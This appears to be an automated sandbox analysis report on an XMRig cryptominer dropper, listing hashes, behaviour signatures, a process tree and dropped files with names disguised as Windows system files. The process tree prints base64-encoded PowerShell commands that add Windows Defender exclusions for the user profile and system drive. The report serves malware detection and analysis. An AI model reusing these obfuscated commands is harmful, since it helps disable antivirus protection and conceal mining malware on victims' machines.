Analysis

  • max time kernel
    299s
  • max time network
    300s
  • platform
    windows7_x64
  • resource
    win7-20240903-en
  • resource tags

    arch:x64arch:x86image:win7-20240903-enlocale:en-usos:windows7-x64system
  • submitted
    17/03/2025, 23:45

General

  • Target

    00b7e5b7d85431b60afa8d886c6df155e2a2d341319f4912a61d495e729048d5.exe

  • Size

    17.6MB

  • MD5

    c74b09048451ab0d821dabdfce289d2b

  • SHA1

    70200cd8a0838940239cea5cb7f284143d1b374f

  • SHA256

    00b7e5b7d85431b60afa8d886c6df155e2a2d341319f4912a61d495e729048d5

  • SHA512

    7c9981115479a56b33d2179a15a762d0d5c301bb82f996e759a6b95a108545188be3f09bcddca1087bff4484a69f8c54946c7891f719188a0bc1c7477bd41332

  • SSDEEP

    393216:t1Ge6D+penpUI6UaIAwy85LM0j+CL9ynDgTz4KlJ4FZUNu:iem+p0pUI/Aw95Y0aw9ynDYyFZU

Malware Config

Signatures

  • Xmrig family
  • xmrig

    XMRig is a high performance, open source, cross platform CPU/GPU miner.

  • XMRig Miner payload 9 IoCs
  • Sets service image path in registry 2 TTPs 1 IoCs
  • Executes dropped EXE 5 IoCs
  • Loads dropped DLL 9 IoCs
  • Obfuscated Files or Information: Command Obfuscation 1 TTPs

    Adversaries may obfuscate content during command execution to impede detection.

  • Suspicious use of NtSetInformationThreadHideFromDebugger 1 IoCs
  • Suspicious use of SetThreadContext 1 IoCs
  • UPX packed file 16 IoCs

    Detects executables packed with UPX/modified UPX open source packer.

  • Drops file in Windows directory 3 IoCs
  • Detects Pyinstaller 1 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • System Location Discovery: System Language Discovery 1 TTPs 4 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

  • Suspicious behavior: EnumeratesProcesses 4 IoCs
  • Suspicious behavior: LoadsDriver 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 5 IoCs
  • Suspicious use of WriteProcessMemory 32 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\00b7e5b7d85431b60afa8d886c6df155e2a2d341319f4912a61d495e729048d5.exe
    "C:\Users\Admin\AppData\Local\Temp\00b7e5b7d85431b60afa8d886c6df155e2a2d341319f4912a61d495e729048d5.exe"
    1⤵
    • Loads dropped DLL
    • Drops file in Windows directory
    • System Location Discovery: System Language Discovery
    • Suspicious use of WriteProcessMemory
    PID:2764
    • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHkAegBjACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHAAdABiACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHMAYgBjACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGoAawB5ACMAPgA="
      2⤵
      • System Location Discovery: System Language Discovery
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:2808
    • C:\Windows\mei.exe
      "C:\Windows\mei.exe"
      2⤵
      • Executes dropped EXE
      • Drops file in Windows directory
      • System Location Discovery: System Language Discovery
      • Suspicious use of WriteProcessMemory
      PID:552
      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHUAawB6ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHUAYgBjACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHcAdQBzACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG0AYgBqACMAPgA="
        3⤵
        • System Location Discovery: System Language Discovery
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:2736
      • C:\Windows\splwow86.exe
        "C:\Windows\splwow86.exe"
        3⤵
        • Executes dropped EXE
        • Suspicious use of SetThreadContext
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of WriteProcessMemory
        PID:2600
        • C:\Windows\explorer.exe
          explorer.exe
          4⤵
          • Suspicious use of AdjustPrivilegeToken
          PID:1608
      • C:\Windows\winhlp64.exe
        "C:\Windows\winhlp64.exe"
        3⤵
        • Executes dropped EXE
        • Suspicious use of WriteProcessMemory
        PID:2712
        • C:\Windows\winhlp64.exe
          "C:\Windows\winhlp64.exe"
          4⤵
          • Executes dropped EXE
          • Loads dropped DLL
          PID:1584
    • C:\Users\Admin\AppData\Local\Temp\calstr.exe
      "C:\Users\Admin\AppData\Local\Temp\calstr.exe"
      2⤵
      • Sets service image path in registry
      • Executes dropped EXE
      • Suspicious use of NtSetInformationThreadHideFromDebugger
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious behavior: LoadsDriver
      • Suspicious use of AdjustPrivilegeToken
      PID:2568

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads

  • C:\Users\Admin\AppData\Local\Temp\_MEI27122\api-ms-win-core-file-l1-2-0.dll

    Filesize

    21KB

    MD5

    bcb8b9f6606d4094270b6d9b2ed92139

    SHA1

    bd55e985db649eadcb444857beed397362a2ba7b

    SHA256

    fa18d63a117153e2ace5400ed89b0806e96f0627d9db935906be9294a3038118

    SHA512

    869b2b38fd528b033b3ec17a4144d818e42242b83d7be48e2e6da6992111758b302f48f52e0dd76becb526a90a2b040ce143c6d4f0e009a513017f06b9a8f2b9

  • C:\Users\Admin\AppData\Local\Temp\_MEI27122\api-ms-win-core-file-l2-1-0.dll

    Filesize

    18KB

    MD5

    bfffa7117fd9b1622c66d949bac3f1d7

    SHA1

    402b7b8f8dcfd321b1d12fc85a1ee5137a5569b2

    SHA256

    1ea267a2e6284f17dd548c6f2285e19f7edb15d6e737a55391140ce5cb95225e

    SHA512

    b319cc7b436b1be165cdf6ffcab8a87fe29de78f7e0b14c8f562be160481fb5483289bd5956fdc1d8660da7a3f86d8eede35c6cc2b7c3d4c852decf4b2dcdb7f

  • C:\Users\Admin\AppData\Local\Temp\_MEI27122\api-ms-win-core-localization-l1-2-0.dll

    Filesize

    21KB

    MD5

    20ddf543a1abe7aee845de1ec1d3aa8e

    SHA1

    0eaf5de57369e1db7f275a2fffd2d2c9e5af65bf

    SHA256

    d045a72c3e4d21165e9372f76b44ff116446c1e0c221d9cea3ab0a1134a310e8

    SHA512

    96dd48df315a7eea280ca3da0965a937a649ee77a82a1049e3d09b234439f7d927d7fb749073d7af1b23dadb643978b70dcdadc6c503fe850b512b0c9c1c78dd

  • C:\Users\Admin\AppData\Local\Temp\_MEI27122\api-ms-win-core-processthreads-l1-1-1.dll

    Filesize

    21KB

    MD5

    4380d56a3b83ca19ea269747c9b8302b

    SHA1

    0c4427f6f0f367d180d37fc10ecbe6534ef6469c

    SHA256

    a79c7f86462d8ab8a7b73a3f9e469514f57f9fe456326be3727352b092b6b14a

    SHA512

    1c29c335c55f5f896526c8ee0f7160211fd457c1f1b98915bcc141112f8a730e1a92391ab96688cbb7287e81e6814cc86e3b057e0a6129cbb02892108bfafaf4

  • C:\Users\Admin\AppData\Local\Temp\_MEI27122\api-ms-win-core-timezone-l1-1-0.dll

    Filesize

    21KB

    MD5

    2554060f26e548a089cab427990aacdf

    SHA1

    8cc7a44a16d6b0a6b7ed444e68990ff296d712fe

    SHA256

    5ab003e899270b04abc7f67be953eaccf980d5bbe80904c47f9aaf5d401bb044

    SHA512

    fd4d5a7fe4da77b0222b040dc38e53f48f7a3379f69e2199639b9f330b2e55939d89ce8361d2135182b607ad75e58ee8e34b90225143927b15dcc116b994c506

  • C:\Users\Admin\AppData\Local\Temp\_MEI27122\python310.dll

    Filesize

    1.4MB

    MD5

    196deb9a74e6e9e242f04008ea80f7d3

    SHA1

    a54373ebad306f3e6f585bcdf1544fbdcf9c0386

    SHA256

    20b004bfe69166c4961fee93163e795746df39fb31dc67399c0fde57f551eb75

    SHA512

    8c226d3ef21f3ddeee14a098c60ef030fa78590e9505d015ce63ea5e5bbcea2e105ff818e94653df1bddc9ba6ed3b376a1dff5c19266b623fa22cd75ac263b68

  • C:\Users\Admin\AppData\Local\Temp\_MEI27122\ucrtbase.dll

    Filesize

    992KB

    MD5

    0e0bac3d1dcc1833eae4e3e4cf83c4ef

    SHA1

    4189f4459c54e69c6d3155a82524bda7549a75a6

    SHA256

    8a91052ef261b5fbf3223ae9ce789af73dfe1e9b0ba5bdbc4d564870a24f2bae

    SHA512

    a45946e3971816f66dd7ea3788aacc384a9e95011500b458212dc104741315b85659e0d56a41570731d338bdf182141c093d3ced222c007038583ceb808e26fd

  • C:\Users\Admin\AppData\Local\Temp\calstr.exe

    Filesize

    4.9MB

    MD5

    340753116751ef6f5212667501a0e562

    SHA1

    ad4d25b43964c1c54accdcbe97a3f2ca80d15894

    SHA256

    b61907b9081bb5d7125264c5e60de013c02b7b866148248de603fb55f8d39a18

    SHA512

    d9564e38ea4000c16ebacc4a4b95925c8998d2bce33b3ad7bd0aa0b220d60f372d798591f4365b1271085036055519e4a94afd47d51ad5a2c6002e1f54ffc2f2

  • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms

    Filesize

    7KB

    MD5

    38a4e94a78a36c4479d19260dc935e77

    SHA1

    3449c2c585f1cc7a76f38bc51b88f7485e799fa0

    SHA256

    4d51590285eb7109db61e30fc762ce81a28d719aa58f6b2be178f9f9d4a589ee

    SHA512

    b3d51ad23ff24e04ed2a1c69aa073e73d5491736ba209db099acc2be47dab17d4760a61a141cdff90ec22cfca8a3f2098e28509966656c4fbefab998420d4e6d

  • C:\Windows\mei.exe

    Filesize

    12.7MB

    MD5

    f493994ce8e472973d8c16e4b2cfa068

    SHA1

    89340fb7cc6b97f58dbb8b4e2d22c16888e20090

    SHA256

    aa9b0735d1ad8d5a354e2271e5ac16df13741898ba2f3830eb9a7b3d8f6060a6

    SHA512

    c66837c2a3c94b16fb3253dc1edbc5f85b7d3f52c10fec658b15baa2d5fc218b10d6844c371cad9626cafe7aa4693521e142d7d04e70aa5a6baf163555d6a983

  • C:\Windows\splwow86.exe

    Filesize

    2.5MB

    MD5

    eb8a757aa146043c9a1561602b7c4554

    SHA1

    0af6dd734e19ab0b8c3a93677b02a000cd45754e

    SHA256

    cdb80863ac71a18c6b8e04ef80c695dfeb39c25c16bbbe1f62de750dd02311e9

    SHA512

    1bbe7fec856f955370932ddbd5730077bc437b0bd9658dd69a121097c7f3268b74bf2ad799d38be4ed9abda34437d1de2e4a0ef53b2fb6df6165342e153509ba

  • C:\Windows\winhlp64.exe

    Filesize

    10.2MB

    MD5

    b901ed674e58d72de048a4945051946d

    SHA1

    cecd1cc64df9f5a2d6112893f5d2efbd30f4366c

    SHA256

    702159c3c4abfd597dde8edd45e3c4aa0c213828891d8ceaba647647eae9bcd5

    SHA512

    fe911942658716fda3f3752ac0f57bd8c1e7cf21e340743ca1750edd1e09a39d73e3fb6e002efbeebc7fc2b52d169147667430ffcc6a607e4daf0be70753aec6

  • memory/1584-139-0x000007FEF6770000-0x000007FEF6BDE000-memory.dmp

    Filesize

    4.4MB

  • memory/1608-146-0x0000000140000000-0x0000000140848000-memory.dmp

    Filesize

    8.3MB

  • memory/1608-145-0x0000000140000000-0x0000000140848000-memory.dmp

    Filesize

    8.3MB

  • memory/1608-155-0x0000000140000000-0x0000000140848000-memory.dmp

    Filesize

    8.3MB

  • memory/1608-154-0x0000000140000000-0x0000000140848000-memory.dmp

    Filesize

    8.3MB

  • memory/1608-142-0x0000000140000000-0x0000000140848000-memory.dmp

    Filesize

    8.3MB

  • memory/1608-141-0x0000000140000000-0x0000000140848000-memory.dmp

    Filesize

    8.3MB

  • memory/1608-143-0x0000000140000000-0x0000000140848000-memory.dmp

    Filesize

    8.3MB

  • memory/1608-148-0x0000000000130000-0x0000000000150000-memory.dmp

    Filesize

    128KB

  • memory/1608-147-0x0000000140000000-0x0000000140848000-memory.dmp

    Filesize

    8.3MB

  • memory/1608-153-0x0000000140000000-0x0000000140848000-memory.dmp

    Filesize

    8.3MB

  • memory/1608-144-0x0000000140000000-0x0000000140848000-memory.dmp

    Filesize

    8.3MB

  • memory/1608-151-0x0000000140000000-0x0000000140848000-memory.dmp

    Filesize

    8.3MB

  • memory/1608-150-0x0000000140000000-0x0000000140848000-memory.dmp

    Filesize

    8.3MB

  • memory/1608-149-0x0000000140000000-0x0000000140848000-memory.dmp

    Filesize

    8.3MB

  • memory/1608-152-0x0000000140000000-0x0000000140848000-memory.dmp

    Filesize

    8.3MB

  • memory/2568-91-0x0000000077870000-0x0000000077872000-memory.dmp

    Filesize

    8KB

  • memory/2568-93-0x000000013F9F0000-0x000000014028F000-memory.dmp

    Filesize

    8.6MB

  • memory/2568-89-0x0000000077870000-0x0000000077872000-memory.dmp

    Filesize

    8KB

  • memory/2568-87-0x0000000077870000-0x0000000077872000-memory.dmp

    Filesize

    8KB